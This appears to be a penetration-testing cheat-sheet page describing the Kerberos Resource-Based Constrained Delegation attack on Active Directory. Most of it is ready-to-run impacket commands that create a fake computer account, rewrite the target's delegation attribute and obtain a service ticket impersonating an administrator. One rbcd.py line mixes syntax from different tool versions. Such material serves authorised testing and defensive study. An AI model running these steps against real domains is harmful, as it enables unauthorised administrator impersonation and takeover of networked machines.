RBCD (Resource-Based Constrained Delegation) Attack

Last modified: 2023-10-22

Active Directory Windows

Kerberos RBCD attack targets a domain computer, exactly service principals related to the target domain computer.

Exploit

Reference: https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation

0. Prerequisites

To achieve this attack successfully, we need the following conditions:

  • A domain account who has permission to write the computer (msDS-AllowedToActOnBehalfOfOtherIdentity property of the domain object).
  • A domain account who has permission to create a new computer.
  • LDAP (389) and SAMR (445) or LDAPS (636) access to the DC.
  • Kerberos (88) access to the DC.

1. Create Fake Computer

impacket-addcomputer -computer-name 'fakecomputer$' -computer-pass 'password' -dc-ip 10.0.0.1 example.local/username:password

2. Modify Delegation Rights

We can use rbcd.py for abusing msDS-AllowedToActOnBehalfOfOtherIdentity property of the target.

rbcd.py -f FAKECOMPUTER -t WEB -dc-ip 10.0.0.1 example\\username:password

rbcd.py 'example.local/fakecomputer$' -delegate-to 'fakecomputer$' -delegate-from user1 -action write -use-ldaps -k -no-pass

3. Get the Impersonated Service Ticket

Impersonated service tickets may allow high-level access to services on the target like CIFS (Common Internet File System), HTTPs, etc.

getST.py -spn cifs/example.local -impersonate admin -dc-ip 10.0.0.1 example.local/FAKECOMPUTER$:password

After getting a service ticket, reveal it to retrieve credentials.

export KRB5CCNAME=`pwd`/admin.ccache
klist